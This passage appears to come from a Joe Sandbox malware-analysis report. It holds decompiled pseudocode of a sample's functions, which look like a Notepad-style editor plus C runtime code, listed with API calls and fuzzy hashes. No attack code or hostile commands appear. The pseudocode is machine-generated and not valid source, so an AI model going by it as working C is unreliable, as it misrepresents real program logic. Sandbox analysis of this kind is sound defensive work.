                    				_t24 = HeapAlloc(GetProcessHeap(), 0, _t60 + _t60);
                    				_t58 = _t24;
                    				if(_t58 == 0) {
                    					L12:
                    					return _t24;
                    				} else {
                    					do {
                    						GetWindowTextW( *0x2970ec, _t58, _t60);
                    						SendMessageW( *0x2970ec, 0xb0, 0,  &_v8);
                    						_t61 = _a4;
                    						_t30 = ( *(_t61 + 0xc) & 0x00000005) - 1;
                    						if(_t30 == 0) {
                    							goto L6;
                    						} else {
                    							_t24 = _t30 - 4;
                    							if(_t24 != 0) {
                    								goto L12;
                    							} else {
                    								_t65 = _v8 -  ~_t58;
                    								L6:
                    								if(_t65 == 0) {
                    									_v8 = 0xffffffff;
                    								}
                    								HeapFree(GetProcessHeap(), 0, _t58);
                    								_t35 = _v8;
                    								if(_t35 == 0xffffffff) {
                    									return SendMessageW( *0x2970ec, 0xb1, 0, 0);
                    								}
                    								goto L9;
                    							}
                    						}
                    						goto L13;
                    						L9:
                    						SendMessageW( *0x2970ec, 0xb1, _t35, _t35 + _v12);
                    						SendMessageW( *0x2970ec, 0xc2, 1,  *(_t61 + 0x14));
                    						_t16 = GetWindowTextLengthW( *0x2970ec) + 1; // 0x1
                    						_t60 = _t16;
                    						_t43 = HeapAlloc(GetProcessHeap(), 0, _t60 + _t60);
                    						_t58 = _t43;
                    					} while (_t58 != 0);
                    					return _t43;
                    				}
                    				L13:
                    			}













                    APIs
                    • lstrlenW.KERNEL32(?), ref: 00282210
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0028222F
                    • GetWindowTextLengthW.USER32(?), ref: 00282237
                    • GetProcessHeap.KERNEL32(00000000), ref: 00282246
                    • HeapAlloc.KERNEL32(00000000), ref: 0028224D
                    • GetWindowTextW.USER32 ref: 00282269
                    • SendMessageW.USER32(?,000000B0,00000000,?), ref: 00282281
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002822BA
                    • HeapFree.KERNEL32(00000000), ref: 002822BD
                    • SendMessageW.USER32(?,000000B1,?), ref: 002822DE
                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 002822F2
                    • GetWindowTextLengthW.USER32(?), ref: 002822FA
                    • GetProcessHeap.KERNEL32(00000000), ref: 00282309
                    • HeapAlloc.KERNEL32(00000000), ref: 0028230C
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00282335
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Heap$MessageSend$ProcessTextWindow$AllocLength$Freelstrlen
                    • String ID:
                    • API String ID: 3644332920-0
                    • Opcode ID: 6cf8f58e82c58e0990c099f4d32a03d8eba7347ebfce06e0df65c9f23261b0f8
                    • Instruction ID: ac731161e8f10dc9904bad2bd5f6fb28fcc837cc38ef852e3bab359230ced980
                    • Opcode Fuzzy Hash: 6cf8f58e82c58e0990c099f4d32a03d8eba7347ebfce06e0df65c9f23261b0f8
                    • Instruction Fuzzy Hash: 3B318076610309EFD710DFA4EC8DF6AB778EB88714F50810AF909972E0CA71E905CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 55%
                    			E00282690(WCHAR* __eax) {
                    				short _v524;
                    				signed int _t14;
                    				signed int _t15;
                    				WCHAR* _t16;
                    				signed int _t17;
                    				int _t20;
                    				void* _t29;
                    				void* _t33;
                    				WCHAR* _t36;
                    				short _t37;
                    				signed int _t41;
                    				signed int _t42;
                    				signed int _t43;
                    				intOrPtr* _t55;
                    				WCHAR* _t59;
                    
                    				_t59 = __eax;
                    				_t37 = 0;
                    				if( *((short*)(__eax)) == 0x20) {
                    					do {
                    						_t59 =  &(_t59[1]);
                    					} while ( *_t59 == 0x20);
                    				}
                    				_t14 =  *_t59 & 0x0000ffff;
                    				_t41 = (0 | _t14 == 0x00000022) + (0 | _t14 == 0x00000022) + 0x00000020 & 0x0000ffff;
                    				if(_t14 == _t41) {
                    					_t59 =  &(_t59[1]);
                    				}
                    				_t15 =  *_t59 & 0x0000ffff;
                    				if(_t15 == 0) {
                    					L7:
                    					if( *_t59 == _t41) {
                    						goto L8;
                    					}
                    				} else {
                    					while(_t15 != _t41) {
                    						_t15 = _t59[1] & 0x0000ffff;
                    						_t59 =  &(_t59[1]);
                    						if(_t15 != 0) {
                    							continue;
                    						} else {
                    							goto L7;
                    						}
                    						goto L9;
                    					}
                    					L8:
                    					_t59 =  &(_t59[1]);
                    				}
                    				L9:
                    				while( *_t59 == 0x20) {
                    					_t59 =  &(_t59[1]);
                    				}
                    				_t16 = _t59;
                    				while(1) {
                    					_t42 =  *_t16 & 0x0000ffff;
                    					if(_t42 != 0x20 && _t42 != 0x2d && _t42 != 0x2f) {
                    						break;
                    					}
                    					_t16 =  &(_t16[1]);
                    					if(_t42 != 0x20) {
                    						_t43 =  *_t16 & 0x0000ffff;
                    						if(_t43 != 0) {
                    							_t16 =  &(_t16[1]);
                    						}
                    						while( *_t16 == 0x20) {
                    							_t16 =  &(_t16[1]);
                    						}
                    						if(_t43 == 0x50 || _t43 == 0x70) {
                    							if(_t37 == 0) {
                    								_t37 = 1;
                    								_t59 = _t16;
                    							}
                    						}
                    					}
                    					L45:
                    				}
                    				_t17 =  *_t59 & 0x0000ffff;
                    				if(_t17 == 0) {
                    					return _t17;
                    				} else {
                    					if(_t17 == 0x22) {
                    						_t59 =  &(_t59[1]);
                    						_t36 = _t59;
                    						if( *_t59 != 0) {
                    							while( *_t36 != 0x22) {
                    								_t36 =  &(_t36[1]);
                    								if( *_t36 != 0) {
                    									continue;
                    								}
                    								goto L32;
                    							}
                    						}
                    						L32:
                    						 *_t36 = 0;
                    					}
                    					_t55 =  *0x280000; // 0x905a4d
                    					_push(_t59);
                    					if( *_t55() != 0) {
                    						L35:
                    						 *0x280000(_t59, 0xffffffff);
                    						_t20 = InvalidateRect( *0x2970e4, 0, 0);
                    						if(_t37 == 0) {
                    							goto L43;
                    						}
                    						return  *0x280000();
                    					} else {
                    						lstrcpynW( &_v524, _t59, 0x103 - lstrlenW(L".txt"));
                    						lstrcatW( &_v524, L".txt");
                    						_t59 =  &_v524;
                    						_push(_t59);
                    						if( *_t55() == 0) {
                    							_t29 = E00282610( &_v524) - 2;
                    							if(_t29 == 0) {
                    								_t20 = DestroyWindow( *0x2970e4);
                    								L43:
                    								return _t20;
                    							}
                    							_t20 = _t29 - 4;
                    							if(_t20 != 0) {
                    								goto L43;
                    							}
                    							lstrcpyW(0x297570,  &_v524);
                    							 *0x297778 = 0;
                    							GetFileTitleW( &_v524, 0x297778, 0x32);
                    							 *0x297980 = 0;
                    							_t33 = CreateFileW( &_v524, 0x40000000, 2, 0, 4, 0x80, 0);
                    							if(_t33 != 0xffffffff) {
                    								CloseHandle(_t33);
                    							}
                    							return  *0x280000();
                    						} else {
                    							goto L35;
                    						}
                    					}
                    				}
                    				goto L45;
                    			}


















                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID: .txt
                    • API String ID: 0-2195685702
                    • Opcode ID: d97aaed6261ee0f7788ec05ea34ab2a3be86cf1343b0855375b7853a0e0a4661
                    • Instruction ID: 3bf0595eebac5de2ad1b18e5868a71838e70d44a66886fd02558aea9b8b7c482
                    • Opcode Fuzzy Hash: d97aaed6261ee0f7788ec05ea34ab2a3be86cf1343b0855375b7853a0e0a4661
                    • Instruction Fuzzy Hash: 7D51E57E922226DBDF347F65EC8DBB6B3A4EF14710F14015AE986920D0F7704CA88761
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E00281FF0(intOrPtr _a4) {
                    				void* _v8;
                    				int _v12;
                    				signed int _t27;
                    				intOrPtr _t43;
                    				int _t56;
                    				void* _t58;
                    
                    				_t43 = _a4;
                    				_v12 = lstrlenW( *(_t43 + 0x10));
                    				_t4 = GetWindowTextLengthW( *0x2970ec) + 1; // 0x1
                    				_t56 = _t4;
                    				_t27 = HeapAlloc(GetProcessHeap(), 0, _t56 + _t56);
                    				_t58 = _t27;
                    				if(_t58 == 0) {
                    					L13:
                    					return _t27;
                    				} else {
                    					GetWindowTextW( *0x2970ec, _t58, _t56);
                    					SendMessageW( *0x2970ec, 0xb0, 0,  &_v8);
                    					_t27 =  *(_t43 + 0xc) & 0x00000005;
                    					if(_t27 > 5) {
                    						goto L13;
                    					} else {
                    						switch( *((intOrPtr*)(_t27 * 4 +  &M00282110))) {
                    							case 0:
                    								goto L10;
                    							case 1:
                    								goto L13;
                    							case 2:
                    								_t44 =  *(_t43 + 0x10);
                    								_t57 = _t58 + (_v8 - _v12) * 2 - 2;
                    								lstrlenW(_t44);
                    								if(_t57 < _t58) {
                    									L7:
                    									_t57 = 0;
                    								} else {
                    									while(lstrcmpW(_t57, _t44) != 0) {
                    										_t57 = _t57 - 2;
                    										if(_t57 >= _t58) {
                    											continue;
                    										} else {
                    											goto L7;
                    										}
                    										goto L8;
                    									}
                    								}
                    								L8:
                    								_t45 = _a4;
                    								L10:
                    								_v8 = _t57 - _t58 >> 1;
                    								HeapFree(GetProcessHeap(), 0, _t58);
                    								if(_t57 != 0) {
                    									return SendMessageW( *0x2970ec, 0xb1, _v8, _v8 + _v12);
                    								}
                    								_push(0x40);
                    								_push( *((intOrPtr*)(_t45 + 0x10)));
                    								_push(0x17b);
                    								_push( *0x2970e8);
                    								return  *0x280000();
                    								goto L14;
                    						}
                    					}
                    				}
                    				L14:
                    			}









                    APIs
                    • lstrlenW.KERNEL32(?), ref: 00282000
                    • GetWindowTextLengthW.USER32(?), ref: 00282010
                    • GetProcessHeap.KERNEL32(00000000), ref: 0028201F
                    • HeapAlloc.KERNEL32(00000000), ref: 00282026
                    • GetWindowTextW.USER32 ref: 0028203E
                    • SendMessageW.USER32(?,000000B0,00000000,?), ref: 00282056
                    • lstrlenW.KERNEL32(?), ref: 00282080
                    • lstrcmpW.KERNEL32(?,?), ref: 00282092
                    • GetProcessHeap.KERNEL32(00000000), ref: 002820B9
                    • HeapFree.KERNEL32(00000000), ref: 002820C0
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Heap$ProcessTextWindowlstrlen$AllocFreeLengthMessageSendlstrcmp
                    • String ID:
                    • API String ID: 1368074758-0
                    • Opcode ID: b403cecdd9249dbfddf1807cf819cc3136ca83ae7b2c4ec86302b041634080a7
                    • Instruction ID: 21995c4cf460e4af86b09fb496de49a243d0c83920fad183772143e15c0c25f3
                    • Opcode Fuzzy Hash: b403cecdd9249dbfddf1807cf819cc3136ca83ae7b2c4ec86302b041634080a7
                    • Instruction Fuzzy Hash: D6316D76611208EFCB10DFA8FCCDF6A7B79FB98711F148406EA0A97290C630A914CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00282130(intOrPtr __edi) {
                    				void* _v8;
                    				void* _v12;
                    				int _v16;
                    				void* _t19;
                    				void* _t26;
                    				signed int _t27;
                    				void* _t34;
                    				intOrPtr _t44;
                    				int _t45;
                    
                    				_t44 = __edi;
                    				_v16 = lstrlenW( *(__edi + 0x10));
                    				_t3 = GetWindowTextLengthW( *0x2970ec) + 1; // 0x1
                    				_t45 = _t3;
                    				_t19 = HeapAlloc(GetProcessHeap(), 0, _t45 + _t45);
                    				_t34 = _t19;
                    				if(_t34 != 0) {
                    					GetWindowTextW( *0x2970ec, _t34, _t45);
                    					SendMessageW( *0x2970ec, 0xb0,  &_v12,  &_v8);
                    					_t26 = ( *(__edi + 0xc) & 0x00000005) - 1;
                    					if(_t26 == 0) {
                    						L3:
                    						_t27 = _v12;
                    						if(_v8 - _t27 == _v16 && lstrcmpW( *(_t44 + 0x10), _t34 + _t27 * 2) == 0) {
                    							SendMessageW( *0x2970ec, 0xc2, 1,  *(_t44 + 0x14));
                    						}
                    						HeapFree(GetProcessHeap(), 0, _t34);
                    						return E00281FF0(_t44);
                    					}
                    					_t19 = _t26 - 4;
                    					if(_t19 == 0) {
                    						goto L3;
                    					}
                    				}
                    				return _t19;
                    			}












                    APIs
                    • lstrlenW.KERNEL32(?), ref: 0028213C
                    • GetWindowTextLengthW.USER32(?), ref: 0028214C
                    • GetProcessHeap.KERNEL32(00000000), ref: 0028215B
                    • HeapAlloc.KERNEL32(00000000), ref: 00282162
                    • GetWindowTextW.USER32 ref: 0028217A
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00282199
                    • lstrcmpW.KERNEL32(?), ref: 002821BE
                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 002821DA
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002821DF
                    • HeapFree.KERNEL32(00000000), ref: 002821E6
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Heap$MessageProcessSendTextWindow$AllocFreeLengthlstrcmplstrlen
                    • String ID:
                    • API String ID: 276103653-0
                    • Opcode ID: c514d8f6ecc0d49a918f88514ca0b310a8ec4b8aa51e9f1a4eb1f95d677bb2fc
                    • Instruction ID: c0cec1cefe3ffd0548520bcef76ecaa997d3f50c056d272f78f392dfc354abf1
                    • Opcode Fuzzy Hash: c514d8f6ecc0d49a918f88514ca0b310a8ec4b8aa51e9f1a4eb1f95d677bb2fc
                    • Instruction Fuzzy Hash: 13213E76A10209EFDB10EFA4EC8CE6A777CFB48300B008506FA0A97290DA70A9548B60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E00281F50(struct HMENU__* __esi) {
                    				signed int _t4;
                    				signed int _t8;
                    				signed int _t17;
                    				int _t23;
                    
                    				_t4 = SendMessageW( *0x2970ec, 0xc6, 0, 0);
                    				asm("sbb eax, eax");
                    				EnableMenuItem(__esi, 0x110,  ~_t4 + 1);
                    				_t8 = IsClipboardFormatAvailable(1);
                    				asm("sbb eax, eax");
                    				EnableMenuItem(__esi, 0x113,  ~_t8 + 1);
                    				_t23 = 0 | SendMessageW( *0x2970ec, 0xb0, 0, 0) >> 0x00000010 == _t12;
                    				EnableMenuItem(__esi, 0x111, _t23);
                    				EnableMenuItem(__esi, 0x112, _t23);
                    				EnableMenuItem(__esi, 0x114, _t23);
                    				_t17 = GetWindowTextLengthW( *0x2970ec);
                    				asm("sbb eax, eax");
                    				return EnableMenuItem(__esi, 0x116,  ~_t17 + 1);
                    			}








                    APIs
                    • SendMessageW.USER32(?,000000C6,00000000,00000000), ref: 00281F67
                    • EnableMenuItem.USER32 ref: 00281F7B
                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00281F7F
                    • EnableMenuItem.USER32 ref: 00281F91
                    • SendMessageW.USER32(?,000000B0,00000000,00000000), ref: 00281FA3
                    • EnableMenuItem.USER32 ref: 00281FB9
                    • EnableMenuItem.USER32 ref: 00281FC2
                    • EnableMenuItem.USER32 ref: 00281FCB
                    • GetWindowTextLengthW.USER32(?), ref: 00281FD3
                    • EnableMenuItem.USER32 ref: 00281FE5
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: EnableItemMenu$MessageSend$AvailableClipboardFormatLengthTextWindow
                    • String ID:
                    • API String ID: 2096502293-0
                    • Opcode ID: 31088af05e08a50a062e352662d32d304f9db3ef95a0c0b51c76f7e2d528dafe
                    • Instruction ID: 9ebaacd92223f7de4efb172a6879930719cc3c5db8172e0a30180bb5fcdef24f
                    • Opcode Fuzzy Hash: 31088af05e08a50a062e352662d32d304f9db3ef95a0c0b51c76f7e2d528dafe
                    • Instruction Fuzzy Hash: CC0169B17E121C7EF2247B75AC8BFBB225CDFC6B05F104112F702EA0D1CAA599028978
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E002867DB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                    				intOrPtr _t26;
                    				intOrPtr _t30;
                    				intOrPtr _t39;
                    				void* _t40;
                    
                    				_t31 = __ebx;
                    				_push(8);
                    				_push(0x292108);
                    				E00283D50(__ebx, __edi, __esi);
                    				GetModuleHandleW(L"KERNEL32.DLL");
                    				_t39 =  *((intOrPtr*)(_t40 + 8));
                    				 *((intOrPtr*)(_t39 + 0x5c)) = 0x290d30;
                    				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
                    				 *((intOrPtr*)(_t39 + 0x14)) = 1;
                    				 *((intOrPtr*)(_t39 + 0x70)) = 1;
                    				 *((char*)(_t39 + 0xc8)) = 0x43;
                    				 *((char*)(_t39 + 0x14b)) = 0x43;
                    				 *(_t39 + 0x68) = 0x294680;
                    				E00286FB4(__ebx, 1, 0xd);
                    				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
                    				InterlockedIncrement( *(_t39 + 0x68));
                    				 *(_t40 - 4) = 0xfffffffe;
                    				E0028687D();
                    				E00286FB4(_t31, 1, 0xc);
                    				 *(_t40 - 4) = 1;
                    				_t15 = _t40 + 0xc; // 0x282e0d
                    				_t26 =  *_t15;
                    				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
                    				if(_t26 == 0) {
                    					_t30 =  *0x294de8; // 0x294d10
                    					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
                    				}
                    				E00288D2A( *((intOrPtr*)(_t39 + 0x6c)));
                    				 *(_t40 - 4) = 0xfffffffe;
                    				return E00283D95(E00286886());
                    			}








                    APIs
                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00292108,00000008,002868E3,00000000,00000000,?,002840A2,.(,?,?,?,00282E0D,00000000,?), ref: 002867EC
                    • __lock.LIBCMT ref: 00286820
                      • Part of subcall function 00286FB4: __mtinitlocknum.LIBCMT ref: 00286FCA
                      • Part of subcall function 00286FB4: __amsg_exit.LIBCMT ref: 00286FD6
                      • Part of subcall function 00286FB4: EnterCriticalSection.KERNEL32(00000000,00000000,?,00286825,0000000D,?,002840A2,.(,?,?,?,00282E0D,00000000,?), ref: 00286FDE
                    • InterlockedIncrement.KERNEL32(?), ref: 0028682D
                    • __lock.LIBCMT ref: 00286841
                    • ___addlocaleref.LIBCMT ref: 0028685F
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                    • String ID: .($0)$KERNEL32.DLL
                    • API String ID: 637971194-3816618702
                    • Opcode ID: 07016d170939545566bcf6ee9e844bb9e7e507ad9d215c00650ebb8248762096
                    • Instruction ID: 897f178debcedfd16e2537ee1b020bdec4b7f6cfe0dc2366be9cfbc5eb196a45
                    • Opcode Fuzzy Hash: 07016d170939545566bcf6ee9e844bb9e7e507ad9d215c00650ebb8248762096
                    • Instruction Fuzzy Hash: D201AD75412700EFD720BF65E809709FBE0AF10320F10490EE49A577E0CBB0AA64CF14
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E004038EB(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
                    				signed char* _v0;
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				intOrPtr _v24;
                    				char _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				signed int _v40;
                    				signed int _v44;
                    				intOrPtr _v48;
                    				signed int _v52;
                    				intOrPtr _v56;
                    				intOrPtr _v60;
                    				void _v64;
                    				signed int _v68;
                    				char _v84;
                    				intOrPtr _v88;
                    				signed int _v92;
                    				intOrPtr _v100;
                    				void _v104;
                    				intOrPtr* _v112;
                    				signed char* _v184;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t201;
                    				signed int _t202;
                    				char _t203;
                    				signed int _t205;
                    				signed int _t207;
                    				signed char* _t208;
                    				signed int _t209;
                    				signed int _t210;
                    				signed int _t214;
                    				void* _t217;
                    				signed char* _t220;
                    				void* _t222;
                    				void* _t224;
                    				signed char _t228;
                    				signed int _t229;
                    				void* _t231;
                    				void* _t234;
                    				void* _t237;
                    				signed int _t247;
                    				void* _t250;
                    				intOrPtr* _t251;
                    				signed int _t252;
                    				intOrPtr _t253;
                    				signed int _t254;
                    				void* _t259;
                    				void* _t264;
                    				void* _t265;
                    				signed int _t269;
                    				signed char* _t270;
                    				intOrPtr* _t271;
                    				signed char _t272;
                    				signed int _t273;
                    				signed int _t274;
                    				intOrPtr* _t276;
                    				signed int _t277;
                    				signed int _t278;
                    				signed int _t283;
                    				signed int _t290;
                    				signed int _t291;
                    				signed int _t294;
                    				signed int _t296;
                    				signed char* _t297;
                    				signed int _t298;
                    				signed char _t299;
                    				signed int* _t301;
                    				signed char* _t304;
                    				signed int _t314;
                    				signed int _t315;
                    				signed int _t317;
                    				signed int _t327;
                    				void* _t329;
                    				void* _t331;
                    				void* _t332;
                    				void* _t333;
                    				void* _t334;
                    
                    				_t296 = __edx;
                    				_push(_t315);
                    				_t301 = _a20;
                    				_v20 = 0;
                    				_v28 = 0;
                    				_t275 = E004044A9(_a8, _a16, _t301);
                    				_t332 = _t331 + 0xc;
                    				_v12 = _t275;
                    				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
                    					L67:
                    					_t201 = E0040579A(_t270, _t275, _t296, _t315);
                    					asm("int3");
                    					_t329 = _t332;
                    					_t333 = _t332 - 0x38;
                    					_push(_t270);
                    					_t271 = _v112;
                    					__eflags =  *_t271 - 0x80000003;
                    					if( *_t271 == 0x80000003) {
                    						return _t201;
                    					} else {
                    						_push(_t315);
                    						_push(_t301);
                    						_t202 = E004029B3(_t271, _t275, _t296, _t315);
                    						__eflags =  *(_t202 + 8);
                    						if( *(_t202 + 8) != 0) {
                    							__imp__EncodePointer(0);
                    							_t315 = _t202;
                    							_t222 = E004029B3(_t271, _t275, _t296, _t315);
                    							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
                    							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
                    								__eflags =  *_t271 - 0xe0434f4d;
                    								if( *_t271 != 0xe0434f4d) {
                    									__eflags =  *_t271 - 0xe0434352;
                    									if( *_t271 != 0xe0434352) {
                    										_t214 = E00402E31(_t296, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
                    										_t333 = _t333 + 0x1c;
                    										__eflags = _t214;
                    										if(_t214 != 0) {
                    											L84:
                    											return _t214;
                    										}
                    									}
                    								}
                    							}
                    						}
                    						_t203 = _a16;
                    						_v28 = _t203;
                    						_v24 = 0;
                    						__eflags =  *(_t203 + 0xc);
                    						if( *(_t203 + 0xc) > 0) {
                    							_push(_a24);
                    							E00402D64(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
                    							_t298 = _v40;
                    							_t334 = _t333 + 0x18;
                    							_t214 = _v44;
                    							_v20 = _t214;
                    							_v12 = _t298;
                    							__eflags = _t298 - _v32;
                    							if(_t298 >= _v32) {
                    								goto L84;
                    							}
                    							_t277 = _t298 * 0x14;
                    							__eflags = _t277;
                    							_v16 = _t277;
                    							do {
                    								_t278 = 5;
                    								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
                    								_t334 = _t334 + 0xc;
                    								__eflags = _v64 - _t217;
                    								if(_v64 > _t217) {
                    									goto L83;
                    								}
                    								__eflags = _t217 - _v60;
                    								if(_t217 > _v60) {
                    									goto L83;
                    								}
                    								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
                    								_t283 = _t220[4];
                    								__eflags = _t283;
                    								if(_t283 == 0) {
                    									L81:
                    									__eflags =  *_t220 & 0x00000040;
                    									if(( *_t220 & 0x00000040) == 0) {
                    										_push(0);
                    										_push(1);
                    										E0040386B(_t298, _t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
                    										_t298 = _v12;
                    										_t334 = _t334 + 0x30;
                    									}
                    									goto L83;
                    								}
                    								__eflags =  *((char*)(_t283 + 8));
                    								if( *((char*)(_t283 + 8)) != 0) {
                    									goto L83;
                    								}
                    								goto L81;
                    								L83:
                    								_t298 = _t298 + 1;
                    								_t214 = _v20;
                    								_t277 = _v16 + 0x14;
                    								_v12 = _t298;
                    								_v16 = _t277;
                    								__eflags = _t298 - _v32;
                    							} while (_t298 < _v32);
                    							goto L84;
                    						}
                    						E0040579A(_t271, _t275, _t296, _t315);
                    						asm("int3");
                    						_push(_t329);
                    						_t297 = _v184;
                    						_push(_t271);
                    						_push(_t315);
                    						_push(0);
                    						_t205 = _t297[4];
                    						__eflags = _t205;
                    						if(_t205 == 0) {
                    							L109:
                    							_t207 = 1;
                    							__eflags = 1;
                    						} else {
                    							_t276 = _t205 + 8;
                    							__eflags =  *_t276;
                    							if( *_t276 == 0) {
                    								goto L109;
                    							} else {
                    								__eflags =  *_t297 & 0x00000080;
                    								_t304 = _v0;
                    								if(( *_t297 & 0x00000080) == 0) {
                    									L91:
                    									_t272 = _t304[4];
                    									_t317 = 0;
                    									__eflags = _t205 - _t272;
                    									if(_t205 == _t272) {
                    										L101:
                    										__eflags =  *_t304 & 0x00000002;
                    										if(( *_t304 & 0x00000002) == 0) {
                    											L103:
                    											_t208 = _a4;
                    											__eflags =  *_t208 & 0x00000001;
                    											if(( *_t208 & 0x00000001) == 0) {
                    												L105:
                    												__eflags =  *_t208 & 0x00000002;
                    												if(( *_t208 & 0x00000002) == 0) {
                    													L107:
                    													_t317 = 1;
                    													__eflags = 1;
                    												} else {
                    													__eflags =  *_t297 & 0x00000002;
                    													if(( *_t297 & 0x00000002) != 0) {
                    														goto L107;
                    													}
                    												}
                    											} else {
                    												__eflags =  *_t297 & 0x00000001;
                    												if(( *_t297 & 0x00000001) != 0) {
                    													goto L105;
                    												}
                    											}
                    										} else {
                    											__eflags =  *_t297 & 0x00000008;
                    											if(( *_t297 & 0x00000008) != 0) {
                    												goto L103;
                    											}
                    										}
                    										_t207 = _t317;
                    									} else {
                    										_t184 = _t272 + 8; // 0x6e
                    										_t209 = _t184;
                    										while(1) {
                    											_t273 =  *_t276;
                    											__eflags = _t273 -  *_t209;
                    											if(_t273 !=  *_t209) {
                    												break;
                    											}
                    											__eflags = _t273;
                    											if(_t273 == 0) {
                    												L97:
                    												_t210 = _t317;
                    											} else {
                    												_t274 =  *((intOrPtr*)(_t276 + 1));
